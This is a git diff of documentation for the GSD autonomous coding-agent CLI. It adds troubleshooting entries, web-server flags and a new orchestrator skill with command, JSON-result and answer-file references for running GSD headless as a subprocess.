+2. Tool results (`toolResult`, `bashExecution`) older than the configured turn threshold are replaced with `[result masked — within summarized history]`
+3. Recent tool results (within the keep window) are preserved in full
+4. All assistant and user messages are always preserved — only tool result content is masked
+
+This pairs with the existing compaction system: masking reduces context pressure between compactions, and compaction handles the full context reset when the window fills.
+
+### Tool Result Truncation
+
+Individual tool results that exceed `tool_result_max_chars` (default: 800) are truncated with a `…[truncated]` marker. This prevents a single large tool output from dominating the context window.
+
+## Phase Handoff Anchors
+
+*Introduced in v2.59.0*
+
+When auto-mode transitions between phases (research → planning → execution), structured JSON anchors are written to `.gsd/milestones/<mid>/anchors/<phase>.json`. Downstream prompt builders inject these anchors so the next phase inherits intent, decisions, blockers, and next steps without re-inferring from artifact files.
+
+This reduces context drift — the 65% of enterprise agent failures caused by agents losing track of prior decisions across phase boundaries.
+
+Anchors are written automatically after successful completion of `research-milestone`, `research-slice`, `plan-milestone`, and `plan-slice` units. No configuration needed.
+
 ## Prompt Compression
 
 *Introduced in v2.29.0*
diff --git a/docs/troubleshooting.md b/docs/troubleshooting.md
index 977a7881a..875bba7fc 100644
--- a/docs/troubleshooting.md
+++ b/docs/troubleshooting.md
@@ -97,6 +97,8 @@ models:
 
 **Headless mode:** `gsd headless auto` auto-restarts the entire process on crash (default 3 attempts with exponential backoff). Combined with provider error auto-resume, this enables true overnight unattended execution.
 
+For common provider setup issues (role errors, streaming errors, model ID mismatches), see the [Provider Setup Guide — Common Pitfalls](./providers.md#common-pitfalls).
+
 ### Budget ceiling reached
 
 **Symptoms:** Auto mode pauses with "Budget ceiling reached."
@@ -151,6 +153,38 @@ rm -rf "$(dirname .gsd)/.gsd.lock"
 - If the error persists, close tools that may be holding the file open and then retry.
 - If repeated failures continue, run `/gsd doctor` to confirm the repo state is still healthy and report the exact path + error code.
 
+### Node v24 web boot failure
+
+**Symptoms:** `gsd --web` fails with `ERR_UNSUPPORTED_NODE_MODULES_TYPE_STRIPPING` on Node v24.
+
+**Cause:** Node v24 changed type-stripping behavior for `node_modules`, breaking the Next.js web build.
+
+**Fix:** Fixed in v2.42.0+ (#1864). Upgrade to the latest version.
+
+### Orphan web server process
+
+**Symptoms:** `gsd --web` fails because port 3000 is already in use, even though no GSD session is running.
+
+**Cause:** A previous web server process was not cleaned up on exit.
+
+**Fix:** Fixed in v2.42.0+. GSD now cleans up stale web server processes automatically. If you're on an older version, kill the orphan process manually: `lsof -ti:3000 | xargs kill`.
+
+### Non-JS project blocked by worktree health check
+
+**Symptoms:** Worktree health check fails or blocks auto-mode in projects that don't use Node.js (e.g., Rust, Go, Python).
+
+**Cause:** The worktree health check only recognized JavaScript ecosystems prior to v2.42.0.
+
+**Fix:** Fixed in v2.42.0+ (#1860). The health check now supports 17+ ecosystems. Upgrade to the latest version.
+
+### German/non-English locale git errors
+
+**Symptoms:** Git commands fail or produce unexpected results when the system locale is non-English (e.g., German).
+
+**Cause:** GSD parsed git output assuming English locale strings.
+
+**Fix:** Fixed in v2.42.0+. All git commands now force `LC_ALL=C` to ensure consistent English output regardless of system locale.
+
 ## MCP Client Issues
 
 ### `mcp_servers` shows no configured servers
@@ -278,6 +312,16 @@ Doctor rebuilds `STATE.md` from plan and roadmap files on disk and fixes detecte
 - **Forensics:** `/gsd forensics` for structured post-mortem analysis of auto-mode failures
 - **Session logs:** `.gsd/activity/` contains JSONL session dumps for crash forensics
 
+## iTerm2-Specific Issues
+
+### Ctrl+Alt shortcuts trigger the wrong action (e.g., Ctrl+Alt+G opens external editor instead of GSD dashboard)
+
+**Symptoms:** Pressing Ctrl+Alt+G opens the external editor prompt (Ctrl+G) instead of the GSD dashboard. Other Ctrl+Alt shortcuts behave as their Ctrl-only counterparts.
+
+**Cause:** iTerm2's default Left Option Key setting is "Normal", which swallows the Alt modifier for Ctrl+Alt key combinations. The terminal receives only the Ctrl key, so Ctrl+Alt+G arrives as Ctrl+G.
+
+**Fix:** In iTerm2, go to **Profiles → Keys → General** and set **Left Option Key** to **Esc+**. This makes Alt/Option send an escape prefix that terminal applications can detect, enabling Ctrl+Alt shortcuts to work correctly.
+
 ## Windows-Specific Issues
 
 ### LSP returns ENOENT on Windows (MSYS2/Git Bash)
@@ -339,3 +383,33 @@ This shows which servers are active and, if none are found, diagnoses why — in
 | Go | `go install golang.org/x/tools/gopls@latest` |
 
 After installing, run `lsp reload` to restart detection without restarting GSD.
+
+## Notifications
+
+### Notifications not appearing on macOS
+
+**Symptoms:** `notifications.enabled: true` in preferences, but no desktop notifications appear during auto-mode (no milestone complete alerts, no budget warnings, no error notifications). No error messages logged.
+
+**Cause:** GSD uses `osascript display notification` as a fallback on macOS. This command is attributed to your terminal app (Ghostty, iTerm2, Alacritty, Kitty, Warp, etc.). If that app doesn't have notification permissions in System Settings → Notifications, macOS silently drops the notification — `osascript` exits 0 with no error.
+
+Most terminal apps don't appear in the Notifications settings panel until they've successfully delivered at least one notification, creating a chicken-and-egg problem.
+
+**Fix (recommended):** Install `terminal-notifier`, which registers as its own Notification Center app:
+
+```bash
+brew install terminal-notifier
+```
+
+GSD automatically prefers `terminal-notifier` when available. On first use, macOS will prompt you to allow notifications — this is the expected behavior.
+
+**Fix (alternative):** Go to **System Settings → Notifications** and enable notifications for your terminal app. If your terminal doesn't appear in the list, try sending a test notification from Terminal.app first to register "Script Editor":
+
+```bash
+osascript -e 'display notification "test" with title "GSD"'
+```
+
+**Verify:** After applying either fix, test with:
+
+```bash
+terminal-notifier -title "GSD" -message "working!" -sound Glass
+```
diff --git a/docs/web-interface.md b/docs/web-interface.md
index ab2ee0ad1..2b55bfccf 100644
--- a/docs/web-interface.md
+++ b/docs/web-interface.md
@@ -7,16 +7,29 @@ GSD includes a browser-based web interface for project management, real-time pro
 ## Quick Start
 
 ```bash
-pi --web
+gsd --web
 ```
 
 This starts a local web server and opens the GSD dashboard in your default browser.
 
+### CLI Flags (v2.42.0)
+
+```bash
+gsd --web --host 0.0.0.0 --port 8080 --allowed-origins "https://example.com"
+```
+
+| Flag | Default | Description |
+|------|---------|-------------|
+| `--host` | `localhost` | Bind address for the web server |
+| `--port` | `3000` | Port for the web server |
+| `--allowed-origins` | (none) | Comma-separated list of allowed CORS origins |
+
 ## Features
 
 - **Project management** — view milestones, slices, and tasks in a visual dashboard
 - **Real-time progress** — server-sent events push status updates as auto-mode executes
 - **Multi-project support** — manage multiple projects from a single browser tab via `?project=` URL parameter
+- **Change project root** — switch project directories from the web UI without restarting the server (v2.44)
 - **Onboarding flow** — API key setup and provider configuration through the browser
 - **Model selection** — switch models and providers from the web UI
 
@@ -31,7 +44,7 @@ Key components:
 
 ## Configuration
 
-The web server binds to `localhost` by default. No additional configuration is required.
+The web server binds to `localhost:3000` by default. Use `--host`, `--port`, and `--allowed-origins` to override (see CLI Flags above).
 
 ### Environment Variables
 
@@ -39,6 +52,14 @@ The web server binds to `localhost` by default. No additional configuration is r
 |----------|-------------|
 | `GSD_WEB_PROJECT_CWD` | Default project path when `?project=` is not specified |
 
+## Node v24 Compatibility
+
+Node v24 introduced breaking changes to type stripping that caused `ERR_UNSUPPORTED_NODE_MODULES_TYPE_STRIPPING` on web boot. This is fixed in v2.42.0+ (#1864). If you encounter this error, upgrade GSD.
+
+## Auth Token Persistence
+
+As of v2.42.0, the web UI persists the auth token in `sessionStorage` so it survives page refreshes (#1877). Previously, refreshing the page required re-authentication.
+
 ## Platform Notes
 
 - **Windows**: The web build is skipped on Windows due to Next.js webpack EPERM issues with system directories. The CLI remains fully functional.
diff --git a/docs/what-is-pi/09-the-customization-stack.md b/docs/what-is-pi/09-the-customization-stack.md
index 10a3fb42d..10d032b39 100644
--- a/docs/what-is-pi/09-the-customization-stack.md
+++ b/docs/what-is-pi/09-the-customization-stack.md
@@ -48,8 +48,8 @@ On-demand capability packages following the [Agent Skills standard](https://agen
 ```
 
 **Placement:**
-- `~/.gsd/agent/skills/` or `~/.agents/skills/` (global)
-- `.gsd/skills/` or `.agents/skills/` (project, searched up to git root)
+- `~/.agents/skills/` (global — shared across all agents)
+- `.agents/skills/` (project, searched up to git root)
 
 **Skill structure:**
 ```
diff --git a/docs/what-is-pi/15-pi-packages-the-ecosystem.md b/docs/what-is-pi/15-pi-packages-the-ecosystem.md
index 4e19de60a..7116cca99 100644
--- a/docs/what-is-pi/15-pi-packages-the-ecosystem.md
+++ b/docs/what-is-pi/15-pi-packages-the-ecosystem.md
@@ -38,6 +38,6 @@ Or just use conventional directory names (`extensions/`, `skills/`, `prompts/`,
 
 - [Package gallery](https://shittycodingagent.ai/packages)
 - [npm search](https://www.npmjs.com/search?q=keywords%3Api-package)
-- [Discord community](https://discord.com/invite/3cU7Bz4UPx)
+- [Discord community](https://discord.com/invite/nKXTsAcmbT)
 
 ---
diff --git a/docs/what-is-pi/18-quick-reference-commands-shortcuts.md b/docs/what-is-pi/18-quick-reference-commands-shortcuts.md
index fa6b09ad0..8b195117a 100644
--- a/docs/what-is-pi/18-quick-reference-commands-shortcuts.md
+++ b/docs/what-is-pi/18-quick-reference-commands-shortcuts.md
@@ -40,6 +40,8 @@
 | Alt+Enter (during streaming) | Queue follow-up message |
 | Alt+Up | Retrieve queued messages |
 
+> **iTerm2 users:** Ctrl+Alt shortcuts (e.g., Ctrl+Alt+G for the GSD dashboard) require Left Option Key set to "Esc+" in Profiles → Keys → General. The default "Normal" setting swallows the Alt modifier.
+
 ### CLI
 
 ```bash
diff --git a/docs/working-in-teams.md b/docs/working-in-teams.md
index 71956d5ff..fd5476813 100644
--- a/docs/working-in-teams.md
+++ b/docs/working-in-teams.md
@@ -9,7 +9,7 @@ GSD supports multi-user workflows where several developers work on the same repo
 The simplest way to configure GSD for team use is to set `mode: team` in your project preferences. This enables unique milestone IDs, push branches, and pre-merge checks in one setting:
 
 ```yaml
-# .gsd/preferences.md (project-level, committed to git)
+# .gsd/PREFERENCES.md (project-level, committed to git)
 ---
 version: 1
 mode: team
@@ -38,7 +38,7 @@ Share planning artifacts (milestones, roadmaps, decisions) while keeping runtime
 ```
 
 **What gets shared** (committed to git):
-- `.gsd/preferences.md` — project preferences
+- `.gsd/PREFERENCES.md` — project preferences
 - `.gsd/PROJECT.md` — living project description
 - `.gsd/REQUIREMENTS.md` — requirement contract
 - `.gsd/DECISIONS.md` — architectural decisions
@@ -50,7 +50,7 @@ Share planning artifacts (milestones, roadmaps, decisions) while keeping runtime
 ### 3. Commit the Preferences
 
 ```bash
-git add .gsd/preferences.md
+git add .gsd/PREFERENCES.md
 git commit -m "chore: enable GSD team workflow"
 ```
 
@@ -71,7 +71,7 @@ If you have an existing project with `.gsd/` blanket-ignored:
 
 1. Ensure no milestones are in progress (clean state)
 2. Update `.gitignore` to use the selective pattern above
-3. Add `unique_milestone_ids: true` to `.gsd/preferences.md`
+3. Add `unique_milestone_ids: true` to `.gsd/PREFERENCES.md`
 4. Optionally rename existing milestones to use unique IDs:
    ```
    I have turned on unique milestone ids, please update all old milestone
diff --git a/gsd-orchestrator/SKILL.md b/gsd-orchestrator/SKILL.md
new file mode 100644
index 000000000..ad423afdf
--- /dev/null
+++ b/gsd-orchestrator/SKILL.md
@@ -0,0 +1,215 @@
+---
+name: gsd-orchestrator
+description: >
+  Build software products autonomously via GSD headless mode. Handles the full
+  lifecycle: write a spec, launch a build, poll for completion, handle blockers,
+  track costs, and verify the result. Use when asked to "build something",
+  "create a project", "run gsd", "check build status", or any task that
+  requires autonomous software development via subprocess.
+metadata:
+  openclaw:
+    requires:
+      bins: [gsd]
+    install:
+      kind: node
+      package: gsd-pi
+      bins: [gsd]
+---
+
+<objective>
+You are an autonomous agent that builds software by orchestrating GSD as a subprocess.
+GSD is a headless CLI that plans, codes, tests, and ships software from a spec.
+You control it via shell commands, exit codes, and JSON output — no SDK, no RPC.
+</objective>
+
+<mental_model>
+GSD headless is a subprocess you launch and monitor. Think of it like a junior developer
+you hand a spec to:
+
+1. You write the spec (what to build)
+2. You launch the build (`gsd headless ... new-milestone --context spec.md --auto`)
+3. You wait for it to finish (exit code tells you the outcome)
+4. You check the result (query state, inspect files, verify deliverables)
+5. If blocked, you intervene (steer, supply answers, or escalate)
+
+The subprocess handles all planning, coding, testing, and git commits internally.
+You never write application code yourself — GSD does that.
+</mental_model>
+
+<critical_rules>
+- **Flags before command.** `gsd headless [--flags] [command] [args]`. Flags after the command are ignored.
+- **Redirect stderr.** JSON output goes to stdout. Progress goes to stderr. Always `2>/dev/null` when parsing JSON.
+- **Check exit codes.** 0=success, 1=error, 10=blocked (needs you), 11=cancelled.
+- **Use `query` to poll.** Instant (~50ms), no LLM cost. Use it between steps, not `auto` for status.
+- **Budget awareness.** Track `cost.total` from query results. Set limits before launching long runs.
+- **One project directory per build.** Each GSD project needs its own directory with a `.gsd/` folder.
+</critical_rules>
+
+<routing>
+Route based on what you need to do:
+
+**Build something from scratch:**
+Read `workflows/build-from-spec.md` — write spec, init directory, launch, monitor, verify.
+
+**Check on a running or completed build:**
+Read `workflows/monitor-and-poll.md` — query state, interpret phases, handle blockers.
+
+**Execute with fine-grained control:**
+Read `workflows/step-by-step.md` — run one unit at a time with decision points.
+
+**Understand the JSON output:**
+Read `references/json-result.md` — field reference for HeadlessJsonResult.
+
+**Pre-supply answers or secrets:**
+Read `references/answer-injection.md` — answer file schema and injection mechanism.
+
+**Look up a specific command:**
+Read `references/commands.md` — full command reference with flags and examples.
+</routing>
+
+<quick_reference>
+
+**Launch a full build (spec to working code):**
+```bash
+mkdir -p /tmp/my-project && cd /tmp/my-project && git init
+cat > spec.md << 'EOF'
+# Your Product Spec Here
+Build a ...
+EOF
+gsd headless --output-format json --context spec.md new-milestone --auto 2>/dev/null
+```
+
+**Check project state (instant, free):**
+```bash
+cd /path/to/project
+gsd headless query | jq '{phase: .state.phase, progress: .state.progress, cost: .cost.total}'
+```
+
+**Resume work on an existing project:**
+```bash
+cd /path/to/project
+gsd headless --output-format json auto 2>/dev/null
+```
+
+**Run one step at a time:**
+```bash
+RESULT=$(gsd headless --output-format json next 2>/dev/null)
+echo "$RESULT" | jq '{status: .status, phase: .phase, cost: .cost.total}'
+```
+
+</quick_reference>
+
+<exit_codes>
+| Code | Meaning | Your action |
+|------|---------|-------------|
+| `0`  | Success | Check deliverables, verify output, report completion |
+| `1`  | Error or timeout | Inspect stderr, check `.gsd/STATE.md`, retry or escalate |
+| `10` | Blocked | Query state for blocker details, steer around it or escalate to human |
+| `11` | Cancelled | Process was interrupted — resume with `--resume <sessionId>` or restart |
+</exit_codes>
+
+<project_structure>
+GSD creates and manages all state in `.gsd/`:
+```
+.gsd/
+  PROJECT.md          # What this project is
+  REQUIREMENTS.md     # Capability contract
+  DECISIONS.md        # Architectural decisions (append-only)
+  KNOWLEDGE.md        # Persistent project knowledge (patterns, rules, lessons)
+  STATE.md            # Current phase and next action
+  milestones/
+    M001-xxxxx/
+      M001-xxxxx-CONTEXT.md    # Scope, constraints, assumptions
+      M001-xxxxx-ROADMAP.md    # Slices with checkboxes
+      M001-xxxxx-SUMMARY.md    # Completion summary
+      slices/S01/
+        S01-PLAN.md            # Tasks
+        S01-SUMMARY.md         # Slice summary
+        tasks/
+          T01-PLAN.md          # Individual task spec
+          T01-SUMMARY.md       # Task completion summary
+```
+
+State is derived from files on disk — checkboxes in ROADMAP.md and PLAN.md are the source of truth for completion. You never need to edit these files. GSD manages them. But you can read them to understand progress.
+</project_structure>
+
+<flags>
+| Flag | Description |
+|------|-------------|
+| `--output-format <fmt>` | `text` (default), `json` (structured result at exit), `stream-json` (JSONL events) |
+| `--json` | Alias for `--output-format stream-json` — JSONL event stream to stdout |
+| `--bare` | Skip CLAUDE.md, AGENTS.md, user settings, user skills. Use for CI/ecosystem runs. |
+| `--resume <id>` | Resume a prior headless session by its session ID |
+| `--timeout N` | Overall timeout in ms (default: 300000, use 0 to disable) |
+| `--model ID` | Override LLM model |
+| `--supervised` | Forward interactive UI requests to orchestrator via stdout/stdin |
+| `--response-timeout N` | Timeout (ms) for orchestrator response in supervised mode (default: 30000) |
+| `--answers <path>` | Pre-supply answers and secrets from JSON file |
+| `--events <types>` | Filter JSONL to specific event types (comma-separated, implies `--json`) |
+| `--verbose` | Show tool calls in progress output |
+| `--context <path>` | Spec file path for `new-milestone` (use `-` for stdin) |
+| `--context-text <text>` | Inline spec text for `new-milestone` |
+| `--auto` | Chain into auto-mode after `new-milestone` |
+</flags>
+
+<answer_injection>
+Pre-supply answers and secrets for fully autonomous runs:
+
+```bash
+gsd headless --answers answers.json --output-format json auto 2>/dev/null
+```
+
+```json
+{
+  "questions": { "question_id": "selected_option" },
+  "secrets": { "API_KEY": "sk-..." },
+  "defaults": { "strategy": "first_option" }
+}
+```
+
+- **questions** — question ID to answer (string for single-select, string[] for multi-select)
+- **secrets** — env var to value, injected into child process environment
+- **defaults.strategy** — `"first_option"` (default) or `"cancel"` for unmatched questions
+
+See `references/answer-injection.md` for the full mechanism.
+</answer_injection>
+
+<event_streaming>
+For real-time monitoring, use JSONL event streaming:
+
+```bash
+gsd headless --json auto 2>/dev/null | while read -r line; do
+  TYPE=$(echo "$line" | jq -r '.type')
+  case "$TYPE" in
+    tool_execution_start) echo "Tool: $(echo "$line" | jq -r '.toolName')" ;;
+    extension_ui_request) echo "GSD: $(echo "$line" | jq -r '.message // .title // empty')" ;;
+    agent_end) echo "Session ended" ;;
+  esac
+done
+```
+
+Filter to specific events: `--events agent_end,execution_complete,extension_ui_request`
+
+Available types: `agent_start`, `agent_end`, `tool_execution_start`, `tool_execution_end`,
+`tool_execution_update`, `extension_ui_request`, `message_start`, `message_end`,
+`message_update`, `turn_start`, `turn_end`, `cost_update`, `execution_complete`.
+</event_streaming>
+
+<all_commands>
+| Command | Purpose |
+|---------|---------|
+| `auto` | Run all queued units until milestone complete or blocked (default) |
+| `next` | Run exactly one unit, then exit |
+| `query` | Instant JSON snapshot — state, next dispatch, costs (no LLM, ~50ms) |
+| `new-milestone` | Create milestone from spec file |
+| `dispatch <phase>` | Force specific phase (research, plan, execute, complete, reassess, uat, replan) |
+| `stop` / `pause` | Control auto-mode |
+| `steer <desc>` | Hard-steer plan mid-execution |
+| `skip` / `undo` | Unit control |
+| `queue` | Queue/reorder milestones |
+| `history` | View execution history |
+| `doctor` | Health check + auto-fix |
+| `knowledge <rule>` | Add persistent project knowledge |
+
+See `references/commands.md` for the complete reference.
+</all_commands>
diff --git a/gsd-orchestrator/references/answer-injection.md b/gsd-orchestrator/references/answer-injection.md
new file mode 100644
index 000000000..369a3828b
--- /dev/null
+++ b/gsd-orchestrator/references/answer-injection.md
@@ -0,0 +1,119 @@
+# Answer Injection
+
+Pre-supply answers and secrets to eliminate interactive prompts during headless execution.
+
+## Usage
+
+```bash
+gsd headless --answers answers.json auto
+gsd headless --answers answers.json new-milestone --context spec.md --auto
+```
+
+The `--answers` flag takes a path to a JSON file containing pre-supplied answers and secrets.
+
+## Answer File Schema
+
+```json
+{
+  "questions": {
+    "question_id": "selected_option_label",
+    "multi_select_question": ["option_a", "option_b"]
+  },
+  "secrets": {
+    "API_KEY": "sk-...",
+    "DATABASE_URL": "postgres://..."
+  },
+  "defaults": {
+    "strategy": "first_option"
+  }
+}
+```
+
+### Fields
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `questions` | `Record<string, string \| string[]>` | Map question ID → answer. String for single-select, string array for multi-select. |
+| `secrets` | `Record<string, string>` | Map env var name → value. Injected into child process environment variables. |
+| `defaults.strategy` | `"first_option" \| "cancel"` | Fallback for unmatched questions. Default: `"first_option"`. |
+
+## How Secrets Work
+
+Secrets are injected as environment variables into the GSD child process:
+
+1. The orchestrator passes the answer file via `--answers`
+2. GSD reads the file and sets secret values as env vars in the child process
+3. When `secure_env_collect` runs inside the agent, it finds the keys already in `process.env`
+4. The tool skips the interactive prompt and reports the keys as "already configured"
+
+Secrets are never logged or included in event streams.
+
+## How Question Matching Works
+
+Two-phase correlation:
+
+1. **Observe** — GSD monitors `tool_execution_start` events for `ask_user_questions` to extract question metadata (ID, options, allowMultiple)
+2. **Match** — Subsequent `extension_ui_request` events are correlated to the metadata and responded to with the pre-supplied answer
+
+Handles out-of-order events (extension_ui_request can arrive before tool_execution_start) via a deferred processing queue with 500ms timeout.
+
+## Coexistence with `--supervised`
+
+Both `--answers` and `--supervised` can be active simultaneously. Priority order:
+
+1. Answer injector tries first
+2. If no answer found, supervised mode forwards to the orchestrator
+3. If no orchestrator response within `--response-timeout`, the auto-responder kicks in
+
+## Without Answer Injection
+
+Headless mode has built-in auto-responders for all prompt types:
+
+| Prompt Type | Default Behavior |
+|-------------|-----------------|
+| Select | Picks first option |
+| Confirm | Auto-confirms |
+| Input | Empty string |
+| Editor | Returns prefill or empty |
+
+Answer injection overrides these defaults with specific answers when precision matters.
+
+## Diagnostics
+
+The injector tracks statistics printed in the session summary:
+
+| Stat | Description |
+|------|-------------|
+| `questionsAnswered` | Questions resolved from the answer file |
+| `questionsDefaulted` | Questions handled by the default strategy |
+| `secretsProvided` | Number of secrets injected |
+
+Unused question IDs and secret keys are warned about at exit.
+
+## Example: Orchestrator with Answers
+
+```bash
+# Create answer file
+cat > answers.json << 'EOF'
+{
+  "questions": {
+    "test_framework": "vitest",
+    "package_manager": "pnpm"
+  },
+  "secrets": {
+    "OPENAI_API_KEY": "sk-...",
+    "DATABASE_URL": "postgres://localhost:5432/mydb"
+  },
+  "defaults": {
+    "strategy": "first_option"
+  }
+}
+EOF
+
+# Run with pre-supplied answers
+gsd headless --answers answers.json --output-format json auto 2>/dev/null
+
+# Parse result
+RESULT=$(gsd headless --answers answers.json --output-format json next 2>/dev/null)
+echo "$RESULT" | jq '{status: .status, cost: .cost.total}'
+```
diff --git a/gsd-orchestrator/references/commands.md b/gsd-orchestrator/references/commands.md
new file mode 100644
index 000000000..52b55d61a
--- /dev/null
+++ b/gsd-orchestrator/references/commands.md
@@ -0,0 +1,210 @@
+# GSD Commands Reference
+
+All commands run as subprocesses via `gsd headless [flags] [command] [args...]`.
+
+## Global Flags
+
+These flags apply to any `gsd headless` invocation:
+
+| Flag | Description |
+|------|-------------|
+| `--output-format <fmt>` | `text` (default), `json` (structured result), `stream-json` (JSONL) |
+| `--json` | Alias for `--output-format stream-json` |
+| `--bare` | Minimal context: skip CLAUDE.md, AGENTS.md, user settings, user skills |
+| `--resume <id>` | Resume a prior headless session by ID |
+| `--timeout N` | Overall timeout in ms (default: 300000) |
+| `--model ID` | Override LLM model |
+| `--supervised` | Forward interactive UI requests to orchestrator via stdout/stdin |
+| `--response-timeout N` | Timeout for orchestrator response in supervised mode (default: 30000ms) |
+| `--answers <path>` | Pre-supply answers and secrets from JSON file |
+| `--events <types>` | Filter JSONL output to specific event types (comma-separated, implies `--json`) |
+| `--verbose` | Show tool calls in progress output |
+
+## Exit Codes
+
+| Code | Meaning | When |
+|------|---------|------|
+| `0` | Success | Unit/milestone completed normally |
+| `1` | Error or timeout | Runtime error, LLM failure, or `--timeout` exceeded |
+| `10` | Blocked | Execution hit a blocker requiring human intervention |
+| `11` | Cancelled | User or orchestrator cancelled the operation |
+
+## Workflow Commands
+
+### `auto` (default)
+
+Autonomous mode — loop through all pending units until milestone complete or blocked.
+
+```bash
+gsd headless --output-format json auto
+```
+
+### `next`
+
+Step mode — execute exactly one unit (task/slice/milestone step), then exit. Recommended for orchestrators that need decision points between steps.
+
+```bash
+gsd headless --output-format json next
+```
+
+### `new-milestone`
+
+Create a milestone from a specification document.
+
+```bash
+gsd headless new-milestone --context spec.md
+gsd headless new-milestone --context spec.md --auto
+gsd headless new-milestone --context-text "Build a REST API" --auto
+cat spec.md | gsd headless new-milestone --context - --auto
+```
+
+Extra flags:
+- `--context <path>` — path to spec/PRD file (use `-` for stdin)
+- `--context-text <text>` — inline specification text
+- `--auto` — start auto-mode after milestone creation
+
+### `dispatch <phase>`
+
+Force-route to a specific phase, bypassing normal state-machine routing.
+
+```bash
+gsd headless dispatch research
+gsd headless dispatch plan
+gsd headless dispatch execute
+gsd headless dispatch complete
+gsd headless dispatch reassess
+gsd headless dispatch uat
+gsd headless dispatch replan
+```
+
+### `discuss`
+
+Start guided milestone/slice discussion.
+
+```bash
+gsd headless discuss
+```
+
+### `stop`
+
+Stop auto-mode gracefully.
+
+```bash
+gsd headless stop
+```
+
+### `pause`
+
+Pause auto-mode (preserves state, resumable).
+
+```bash
+gsd headless pause
+```
+
+## State Inspection
+
+### `query`
+
+**Instant JSON snapshot** — state, next dispatch, parallel costs. No LLM, ~50ms. The recommended way for orchestrators to inspect state.
+
+```bash
+gsd headless query
+gsd headless query | jq '.state.phase'
+gsd headless query | jq '.next'
+gsd headless query | jq '.cost.total'
+```
+
+### `status`
+
+Progress dashboard (TUI overlay — useful interactively, not for parsing).
+
+```bash
+gsd headless status
+```
+
+### `history`
+
+Execution history. Supports `--cost`, `--phase`, `--model`, and `limit` arguments.
+
+```bash
+gsd headless history
+```
+
+## Unit Control
+
+### `skip`
+
+Prevent a unit from auto-mode dispatch.
+
+```bash
+gsd headless skip
+```
+
+### `undo`
+
+Revert last completed unit. Use `--force` to bypass confirmation.
+
+```bash
+gsd headless undo
+gsd headless undo --force
+```
+
+### `steer <description>`
+
+Hard-steer plan documents during execution. Useful for mid-course corrections.
+
+```bash
+gsd headless steer "Skip the blocked dependency, use mock instead"
+```
+
+### `queue`
+
+Queue and reorder future milestones.
+
+```bash
+gsd headless queue
+```
+
+## Configuration & Health
+
+### `doctor`
+
+Runtime health checks with auto-fix.
+
+```bash
+gsd headless doctor
+```
+
+### `prefs`
+
+Manage preferences (global/project/status/wizard/setup).
+
+```bash
+gsd headless prefs
+```
+
+### `knowledge <rule|pattern|lesson>`
+
+Add persistent project knowledge.
+
+```bash
+gsd headless knowledge "Always use UTC timestamps in API responses"
+```
+
+## Phases
+
+GSD workflows progress through these phases:
+
+```
+pre-planning → needs-discussion → discussing → researching → planning →
+executing → verifying → summarizing → advancing → validating-milestone →
+completing-milestone → complete
+```
+
+Special phases: `paused`, `blocked`, `replanning-slice`
+
+## Hierarchy
+
+- **Milestone**: Shippable version (4–10 slices, 1–4 weeks)
+- **Slice**: One demoable vertical capability (1–7 tasks, 1–3 days)
+- **Task**: One context-window-sized unit of work (one session)
diff --git a/gsd-orchestrator/references/json-result.md b/gsd-orchestrator/references/json-result.md
new file mode 100644
index 000000000..50eff75c8
--- /dev/null
+++ b/gsd-orchestrator/references/json-result.md
@@ -0,0 +1,162 @@
+# HeadlessJsonResult Reference
+
+When using `--output-format json`, GSD collects events silently and emits a single `HeadlessJsonResult` JSON object to stdout at process exit. This is the structured result for orchestrator decision-making.
+
+## Obtaining the Result
+
+```bash
+# Capture the JSON result
+RESULT=$(gsd headless --output-format json next 2>/dev/null)
+EXIT=$?
+
+# Parse fields with jq
+echo "$RESULT" | jq '.status'
+echo "$RESULT" | jq '.cost.total'
+echo "$RESULT" | jq '.nextAction'
+```
+
+**Important:** Progress text goes to stderr. The JSON result goes to stdout. Redirect stderr to `/dev/null` when parsing stdout.
+
+## Field Reference
+
+### Top-Level Fields
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `status` | `"success" \| "error" \| "blocked" \| "cancelled" \| "timeout"` | Final session status. Maps directly to exit codes. |
+| `exitCode` | `number` | Process exit code: `0` (success), `1` (error/timeout), `10` (blocked), `11` (cancelled). |
+| `sessionId` | `string \| undefined` | Session identifier. Pass to `--resume <id>` to continue this session. |
+| `duration` | `number` | Session wall-clock duration in milliseconds. |
+| `cost` | `CostObject` | Token usage and cost breakdown. See below. |
+| `toolCalls` | `number` | Total number of tool calls made during the session. |
+| `events` | `number` | Total number of events processed during the session. |
+| `milestone` | `string \| undefined` | Active milestone ID (e.g. `"M001"`). |
+| `phase` | `string \| undefined` | Current GSD phase at session end (e.g. `"executing"`, `"blocked"`, `"complete"`). |
+| `nextAction` | `string \| undefined` | Recommended next action from the state machine (e.g. `"dispatch"`, `"complete"`). |
+| `artifacts` | `string[] \| undefined` | Paths to artifacts created or modified during the session. |
+| `commits` | `string[] \| undefined` | Git commit SHAs created during the session. |
+
+### Status → Exit Code Mapping
+
+| Status | Exit Code | Constant | Meaning |
+|--------|-----------|----------|---------|
+| `success` | `0` | `EXIT_SUCCESS` | Unit or milestone completed successfully |
+| `error` | `1` | `EXIT_ERROR` | Runtime error or LLM failure |
+| `timeout` | `1` | `EXIT_ERROR` | `--timeout` deadline exceeded |
+| `blocked` | `10` | `EXIT_BLOCKED` | Execution blocked — needs human intervention |
+| `cancelled` | `11` | `EXIT_CANCELLED` | Cancelled by user or orchestrator |
+
+### Cost Object
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `cost.total` | `number` | Total cost in USD for the session. |
+| `cost.input_tokens` | `number` | Number of input tokens consumed. |
+| `cost.output_tokens` | `number` | Number of output tokens generated. |
+| `cost.cache_read_tokens` | `number` | Number of tokens served from prompt cache. |
+| `cost.cache_write_tokens` | `number` | Number of tokens written to prompt cache. |
+
+## Parsing Patterns
+
+### Decision-Making After Each Step
+
+```bash
+RESULT=$(gsd headless --output-format json next 2>/dev/null)
+EXIT=$?
+
+case $EXIT in
+  0)
+    PHASE=$(echo "$RESULT" | jq -r '.phase')
+    NEXT=$(echo "$RESULT" | jq -r '.nextAction')
+    echo "Success — phase: $PHASE, next: $NEXT"
+    ;;
+  1)
+    STATUS=$(echo "$RESULT" | jq -r '.status')
+    echo "Failed — status: $STATUS"
+    ;;
+  10)
+    echo "Blocked — needs intervention"
+    gsd headless query | jq '.state'
+    ;;
+  11)
+    echo "Cancelled"
+    ;;
+esac
+```
+
+### Cost Tracking
+
+```bash
+RESULT=$(gsd headless --output-format json next 2>/dev/null)
+
+COST=$(echo "$RESULT" | jq -r '.cost.total')
